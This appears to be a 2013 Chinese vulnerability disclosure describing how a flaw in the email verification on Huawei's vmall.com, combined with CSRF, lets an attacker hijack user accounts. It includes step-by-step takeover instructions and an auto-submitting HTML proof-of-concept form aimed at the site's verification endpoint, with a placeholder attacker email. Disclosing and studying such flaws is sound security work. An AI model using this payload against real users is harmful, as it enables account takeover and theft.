华为商城某功能设计权限导致可劫持任意用户账户

浏览：2577 ℃

字体：大中小

发布时间：2013-12-09 23:23:11

来源：

测试站点：www.vmall.com

1.注册一个用户（邮箱帐号xxxx@sina.com）；

2.在个人信息里需要验证邮箱，点击验证邮箱抓包改写了下邮箱为xxxxx@qq.com并提交，发现提交成功了，登陆QQ邮箱成功收到系统的验证邮件；

3.点击邮箱中的验证链接成功验证（汗...）,并且验证后直接成功登陆帐号；

4.这时我们发现，已经验证成功的用户帐号，居然还能继续验证，这里需要构造请求来完成，look，这是我们刚刚验证过的帐号；

5.我们发现邮箱验证功能，这个地方可反复多次验证任意邮箱，并且在收到系统发送的验证邮件后，点击可直接登陆用户帐号；所以，如果能够让用户发送邮箱验证请求到攻击者的邮箱，那攻击者就能劫持该用户的帐号；

6.很幸运，我们发现这个邮箱验证功能存在CSRF的安全问题，例子PoC如下：

<html><form id="test" name="test" action="http://www.vmall.com/member/account/sendEmail.json" method="POST"><input type="hidden" name="email" value="hacker@qq.com" /><input type="submit" value="submit"></from><script>  document.test.submit();</script></html>

7.用户在登陆的情况下访问该页面的话，那么你懂的，而且在测试后发现，华为的很多系统能够通用cookies，这又增加了攻击成功的可能；